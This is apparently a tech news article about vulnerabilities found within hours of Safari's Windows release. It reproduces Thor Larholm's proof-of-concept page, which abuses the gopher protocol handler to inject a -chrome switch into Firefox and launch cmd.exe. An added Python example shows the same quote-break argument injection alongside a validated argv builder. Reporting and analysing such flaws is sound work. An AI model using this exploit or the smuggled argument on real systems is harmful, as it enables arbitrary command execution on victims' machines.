Holy Safari! Apple's ultra secure web browser now ported to Windows perforated repeatedly within hours of release.
It's déjà vu all over again: as with the first ever release of Safari for OS X, which hosed people's hard drives, the first ever release for Windows is getting bad press because of a whole slew of endemic security vulnerabilities.
Aviv Raff, David Maynor, and Thor Larholm are all reporting serious security flaws in the browser.
'Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser', writes Larholm on his blog, and then goes on to explain the workings of a zero-day he found after only two hours of poking around.
What Larholm found was an endemic bug: no fuzzing for once. He has a test page up which may be accessed here - but you're advised not to go there unless you like that kind of fun. Instead you can read the page code below.
<html><body>
<iframe src='gopher://larholm.com" -chrome
"javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)
+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'
+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);process.run(true,{},0);alert(process)'></iframe>
</body></html>
The exploit works by bouncing from Safari through Firefox via the 'gopher' protocol: the URL is passed on unfiltered, so the quote inside it ends the intended argument and the text after it is taken as a -chrome argument, which then launches C:\Windows\System32\cmd.exe - the NT command interpreter - with any arguments you choose to specify in the process.run method.
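The quote-break described above, shown as an added example that is not from the page, from Larholm, or from either browser's code. It assumes a simplified handler template of the form firefox.exe -url "%1" (the real registered command line is not quoted here) and uses a constructed URL; the naive builder reproduces the argument injection, the safe builder shows the validation and argv construction that close it.

```python
import re
import shlex

# Assumed, simplified form of a Windows URI-scheme handler command line:
# the real registered template is not quoted on the page. "%1" is replaced
# by the URL that the calling browser hands over.
HANDLER_TEMPLATE = 'firefox.exe -url "%1"'

# Characters a URI may contain (RFC 3986 unreserved, reserved and "%").
# A double quote, whitespace and control characters are not among them.
URI_CHARS = re.compile(r"[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+")


def naive_handler_argv(url: str) -> list[str]:
    """Build the handler's argv the unsafe way: substitute the URL into the
    command-line template by plain text replacement and let the command-line
    parser split it. A double quote inside the URL terminates the -url
    argument early, so everything after it becomes extra switches."""
    cmdline = HANDLER_TEMPLATE.replace("%1", url)
    return shlex.split(cmdline)


def injected_switches(url: str) -> list[str]:
    """Defender's check: which switches would a naively built command line
    pass to the handler beyond the single -url <value> that was intended?"""
    argv = naive_handler_argv(url)
    return [arg for arg in argv[3:] if arg.startswith("-")]


def safe_handler_argv(url: str) -> list[str]:
    """Build argv the safe way: reject anything that is not a syntactically
    valid URI, and pass the URL as its own argv element instead of splicing
    it into a quoted command line, so there is no quoting context to escape."""
    if not URI_CHARS.fullmatch(url):
        raise ValueError("URL contains characters that cannot occur in a URI")
    return ["firefox.exe", "-url", url]


if __name__ == "__main__":
    # Constructed sample: a URL carrying a quote, shaped like the page's PoC.
    hostile = 'gopher://larholm.com" -chrome "javascript:1'
    print(naive_handler_argv(hostile))   # -chrome shows up as its own switch
    print(injected_switches(hostile))    # ['-chrome']
    print(safe_handler_argv("gopher://larholm.com/"))
```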
The bread's burning.
Aviv Raff is also out with an exploit. 'I've decided to take it for a test drive, and ran Hamachi. I wasn't surprised to get a nice crash a few minutes later', writes Raff, who doesn't think much of Apple's claims of their software being secure.
'This is just a beta version, but don't you hate those pathetic claims?'
Finally, David Maynor's out with his fuzz saw, finding first a 'memory corruption', then a 'stack corruption', and later an additional four 'bugs'.
'These are popping out like hotcakes', writes Maynor.